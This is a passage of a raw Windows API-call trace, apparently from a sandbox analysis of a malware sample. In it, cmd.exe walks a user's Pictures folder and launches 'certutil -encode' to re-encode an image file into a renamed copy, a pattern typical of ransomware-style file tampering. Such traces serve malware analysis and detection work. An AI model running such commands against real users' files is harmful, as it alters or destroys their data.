dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0295.590] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0295.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdabe33e0, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdabe33e0, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7d060 [0295.590] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0295.591] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Cm2WieoPB7gN.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c00470, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0x7d12ada0, ftLastAccessTime.dwHighDateTime=0x1d5e8ad, ftLastWriteTime.dwLowDateTime=0x7d12ada0, ftLastWriteTime.dwHighDateTime=0x1d5e8ad, nFileSizeHigh=0x0, nFileSizeLow=0xe23a, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Cm2WieoPB7gN.png.Sister", cAlternateFileName="CM2WIE~1.SIS")) returned 0x21ed8c7d060 [0295.591] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0295.591] _wcsnicmp (_String1="CM2WIE~1.SIS", _String2="Cm2WieoPB7gN.png.Sister", _MaxCount=0x17) returned 15 [0295.591] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0295.591] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0295.591] GetProcessHeap () returned 0x21ed8c70000 [0295.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8790 [0295.591] ??_V@YAXPEAX@Z () returned 0x1 [0295.591] ??_V@YAXPEAX@Z () returned 0x1 [0295.591] GetProcessHeap () returned 0x21ed8c70000 [0295.591] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f70, Size=0x1f0) returned 0x21ed8d55f70 [0295.591] GetProcessHeap () returned 0x21ed8c70000 [0295.591] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55f70) returned 0x1f0 [0295.592] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0295.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.592] GetFileType (hFile=0x50) returned 0x2 [0295.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.592] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0295.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.593] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0295.601] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0295.601] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0295.601] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0295.601] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0295.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.602] GetFileType (hFile=0x50) returned 0x2 [0295.602] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.602] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0295.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.603] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0295.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.603] GetFileType (hFile=0x50) returned 0x2 [0295.604] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.604] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0295.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.604] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d55f10*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d55f10*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0295.605] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\" ") returned 60 [0295.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.605] GetFileType (hFile=0x50) returned 0x2 [0295.605] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.605] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0295.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.606] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3c) returned 1 [0295.606] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0295.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.607] GetFileType (hFile=0x50) returned 0x2 [0295.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0295.607] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0295.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.607] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0295.613] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0295.621] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0295.622] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0295.622] malloc (_Size=0xffce) returned 0x21eda100000 [0295.622] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0295.622] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0295.622] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0295.622] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0295.622] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0295.622] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0295.622] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0295.622] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0295.622] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0295.622] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0295.622] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0295.622] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0295.622] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0295.622] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0295.622] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0295.622] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0295.622] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0295.622] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0295.622] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0295.623] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0295.623] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0295.623] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0295.623] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0295.623] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0295.623] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0295.623] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0295.623] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0295.623] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0295.623] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0295.623] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0295.623] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0295.623] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0295.623] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0295.623] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0295.623] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0295.623] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0295.623] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0295.623] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0295.623] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0295.623] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0295.623] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0295.623] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0295.623] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0295.623] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0295.623] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0295.624] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0295.624] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0295.624] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0295.624] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0295.624] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0295.624] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0295.624] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0295.624] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0295.624] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0295.624] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0295.624] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0295.624] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0295.624] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0295.624] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0295.624] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0295.624] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0295.624] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0295.624] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0295.624] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0295.624] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0295.624] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0295.624] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0295.624] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0295.624] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0295.624] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0295.624] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0295.624] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0295.625] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0295.625] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0295.625] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0295.625] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0295.625] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0295.625] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0295.625] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0295.625] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0295.625] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0295.625] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0295.625] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0295.625] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0295.625] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0295.625] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0295.625] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0295.625] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0295.625] ??_V@YAXPEAX@Z () returned 0x1 [0295.625] GetProcessHeap () returned 0x21ed8c70000 [0295.625] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cb7020 [0295.626] GetProcessHeap () returned 0x21ed8c70000 [0295.626] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x9a) returned 0x21ed8c7d2a0 [0295.626] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0295.626] malloc (_Size=0xffce) returned 0x21eda100000 [0295.626] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0295.626] GetProcessHeap () returned 0x21ed8c70000 [0295.626] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9380080 [0295.629] SetErrorMode (uMode=0x0) returned 0x0 [0295.629] SetErrorMode (uMode=0x1) returned 0x0 [0295.630] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9380090, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0295.630] SetErrorMode (uMode=0x0) returned 0x1 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9380080, Size=0x54) returned 0x21ed9380080 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9380080) returned 0x54 [0295.630] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0295.630] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d64a30 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d44270 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44270, Size=0x1c0) returned 0x21ed8d64dd0 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64dd0) returned 0x1c0 [0295.630] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0295.630] GetProcessHeap () returned 0x21ed8c70000 [0295.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7c5e0 [0295.631] GetProcessHeap () returned 0x21ed8c70000 [0295.631] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c5e0, Size=0x7e) returned 0x21ed8c7c5e0 [0295.631] GetProcessHeap () returned 0x21ed8c70000 [0295.631] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c5e0) returned 0x7e [0295.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0295.631] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0295.631] GetLastError () returned 0x2 [0295.631] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0295.632] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0295.632] GetLastError () returned 0x2 [0295.632] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0295.632] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0295.632] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0295.632] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0295.633] GetLastError () returned 0x2 [0295.633] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce20 [0295.633] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0295.633] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0295.633] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0295.633] ??_V@YAXPEAX@Z () returned 0x1 [0295.633] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0295.636] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0295.636] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0295.636] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0295.637] GetProcessHeap () returned 0x21ed8c70000 [0295.637] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bc0 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0295.637] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0295.638] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0295.638] GetProcessHeap () returned 0x21ed8c70000 [0295.638] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bc0) returned 1 [0295.639] GetProcessHeap () returned 0x21ed8c70000 [0295.639] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95a40 [0295.639] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0295.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0295.639] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0295.639] _get_osfhandle (_FileHandle=0) returned 0x4c [0295.639] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0295.640] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"Cm2WieoPB7gN.png.Sister\" \"Cm2WieoPB7gN.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x760, dwThreadId=0xe28)) returned 1 [0295.660] CloseHandle (hObject=0xa8) returned 1 [0295.660] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0295.660] GetProcessHeap () returned 0x21ed8c70000 [0295.661] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0295.661] GetEnvironmentStringsW () returned 0x21ed8d44630* [0295.662] GetProcessHeap () returned 0x21ed8c70000 [0295.662] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0295.664] FreeEnvironmentStringsA (penv="=") returned 1 [0295.664] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0296.319] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0296.319] CloseHandle (hObject=0xa4) returned 1 [0296.320] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0296.320] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0296.320] GetProcessHeap () returned 0x21ed8c70000 [0296.320] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0296.320] GetEnvironmentStringsW () returned 0x21ed8d44630* [0296.320] GetProcessHeap () returned 0x21ed8c70000 [0296.320] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0296.320] 